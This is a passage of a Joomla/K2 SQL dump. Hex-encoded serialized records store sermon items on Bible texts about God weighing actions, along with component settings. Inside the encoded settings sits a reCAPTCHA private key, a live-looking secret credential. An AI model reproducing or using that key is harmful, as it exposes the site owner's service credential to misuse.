a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32343a2233323a7468652d63687269737469616e2d77656967687473223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34323a22636f6d706f6e656e742f6b322f6974656d2f33322d7468652d63687269737469616e2d77656967687473223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3332223b733a353a22726f757465223b733a36313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33323a7468652d63687269737469616e2d77656967687473223b733a353a227469746c65223b733a32333a225468652043687269737469616e20262057656967687473223b733a31313a226465736372697074696f6e223b733a3436333a2220546578743a203220436f72696e746869616e732031333a352d383a20352e204578616d696e6520796f757273656c7665732c207768657468657220796520626520696e207468652066616974683b2070726f766520796f7572206f776e2073656c7665732e204b6e6f77207965206e6f7420796f7572206f776e2073656c7665732c20686f772074686174204a657375732043687269737420697320696e20796f752c2065786365707420796520626520726570726f62617465733f2e20362042757420492074727573742074686174207965207368616c6c206b6e6f77207468617420776520617265206e6f7420726570726f62617465732e2e2037204e6f772049207072617920746f20476f64207468617420796520646f206e6f206576696c3b206e6f7420746861742077652073686f756c642061707065617220617070726f7665642c2062757420746861742079652073686f756c6420646f207468617420776869636820697320686f6e6573742c2074686f75676820776520626520617320726570726f62617465732e203820466f722077652063616e20646f206e6f7468696e6720616761696e7374207468652074727574682c2062757420666f72207468652074727574682e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d32302031373a32393a3239223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d32302031373a32393a3239223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(247, 'index.php?option=com_k2&view=item&id=38', 'index.php?option=com_k2&view=item&id=38:recognizing-the-divine-scale', 'Recognizing the Divine Scale', ' Texts: 1 Samuel 2:3, Proverbs 16:2, Isaiah 26:7 1 Samuel 2:3 Talk no more so exceeding proudly; let not arrogancy come out of your mouth: for the LORD is a God of knowledge, and by him actions are weighed. ', '2017-06-25 14:18:34', '7e2a93dec97f3542884e1b4b42b04e00', 1, 1, 1, '*', '2017-04-02 08:51:00', '0000-00-00 00:00:00', '2017-04-02 08:51:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223338223b733a353a22616c696173223b733a32383a227265636f676e697a696e672d7468652d646976696e652d7363616c65223b733a373a2273756d6d617279223b733a3233303a223c703e54657874733a20312053616d75656c20323a332c2050726f76657262732031363a322c204973616961682032363a373c2f703e0d0a3c703e312053616d75656c20323a333c2f703e0d0a3c703e54616c6b206e6f206d6f726520736f20657863656564696e672070726f75646c793b206c6574206e6f74206172726f67616e637920636f6d65206f7574206f6620796f7572206d6f7574683a20666f7220746865204c4f5244206973206120476f64206f66206b6e6f776c656467652c20616e642062792068696d20616374696f6e732061726520776569676865642e3c2f703e0d0a223b733a343a22626f6479223b733a313932333a220d0a3c703e50726f76657262732031363a323c2f703e0d0a3c703e416c6c207468652077617973206f662061206d616e2061726520636c65616e20696e20686973206f776e20657965733b2062757420746865204c4f52442077656967686574682074686520737069726974732e3c2f703e0d0a3c703e4973616961682032363a373c2f703e0d0a3c703e54686520776179206f6620746865206a75737420697320757072696768746e6573733a2074686f752c206d6f737420757072696768742c20646f7374207765696768207468652070617468206f6620746865206a7573742e3c2f703e0d0a3c703e496e74726f64756374696f6e3c2f703e0d0a3c703e497420697320696d706f7274616e7420666f722065766572792062656c696576657220746f206b6e6f77207468617420476f642077656967687320616374696f6e732c2074686f756768747320616e6420696e74656e74696f6e73206f66206d616e2e2057616c6b696e6720636f6e7363696f7573206f66207468697320776f756c64206d616b6520796f752070757420796f757273656c6620726567756c61726c79206f6e2074686520646976696e65207363616c652e20546869732077696c6c2068656c7020796f7520746f206b6e6f7720776865726520796f75207374616e6420616e6420636f727265637420616e797468696e672074686174206d617920626520646973706c656173696e6720746f20746865204c6f72642e20496620796f75206a7564676520796f757273656c662c20476f6420646f6573206e6f74206a7564676520796f75202831436f722e31313a3331292e204c65616e20746f206578616d696e6520796f757273656c662032436f7231333a352e3c2f703e0d0a3c703e5768792073686f756c6420796f7520746869733f3c2f703e0d0a3c703e546f207374616e642070657266656374206265666f726520476f642d2050732e3133393a32332d32343c2f703e0d0a3c703e546f206265206120676f6f64207769746e657373206265666f726520476f6420616e64206d616e2e20416374732032343a31363c2f703e0d0a3c703e466f7220476f6420616e64206d616e20746f2068617665206120676f6f642074657374696d6f6e792061626f757420796f752e203153616d2e31363a372c204c756b6520363a32362c2050726f762e31363a372e3c2f703e0d0a3c703e466f7220796f7520746f206b6e6f77207768657468657220796f7520617265206f6e207468652070617468206f66206c696665206f72207468652070617468206f662064616d6e6174696f6e2e2050726f762e31343a31322c204d6174742e31393a31362d32312e3c2f703e0d0a3c703e466f7220796f7520746f206b6e6f7720796f757220657465726e616c2064657374696e6174696f6e2061667465722064656174682e2032436f722e353a31302c20416d6f7320353a31322d31353c2f703e0d0a3c703e4865726520617265206d65617375726573207468617420476f64207573657320666f72205b75735d2043687269737469616e7320746f206b6e6f7720686f7720776520646f206265666f72652048696d2e3c2f703e0d0a3c703e312e204865207465737473206576657279206d616e202844616e2e333a31362d31382c204a6f686e2031333a31352c2031436f722e31303a31322d3133292c204a616d657320313a322d342c20476f6420646f6573206e6f742074727573742074686520756e7465737465642e3c2f703e0d0a3c703e322e20486520746573747320796f75722070617469656e63652e20284973616961682034303a32302d33312c2050732e33303a35362c2050732e34303a32302d3331292e2050617469656e636520697320746865206162696c69747920746f2068616e646c65207468652070617373616765206f662074696d6520776974686f7574206d69736265686176696e672e3c2f703e0d0a3c703e332e20486520746573747320796f757220617474697475646520746f206d6f6e657920616e642074686520776f726c642e20284a6f736820373a312c2031392d32302c204163747320383a31382d32302c2047656e2e33313a312d362e293c2f703e0d0a3c703e342e20486520746573747320796f7572206f62656469656e636520283153616d2e31352d32312d32322c204e756d2e32303a31302d31322e293c2f703e0d0a3c703e352e20486520746573747320796f757220726573706f6e736520746f206576696c20636f756e73656c7320284a6f6220323a382d31302c20314b696e672032313a342d392e293c2f703e0d0a3c703e362e20486520746573747320796f757220747275746866756c6e65737320616e642073696e6365726974792e20284163747320353a312d31312c20324b696e677320353a31352d3139293c2f703e0d0a3c703e4c6561726e20746f20776569676820796f757273656c66206f6e20746865207363616c65206f6620476f64e28099732077696c6c2065787072657373656420696e2048697320776f726420616e64206279204869732053706972697420616e6420796f75207368616c6c206e6f7420626520666f756e642077616e74696e6720696e204a65737573e28099206e616d652e20416d656e2e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30342d30322031313a33313a3331223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c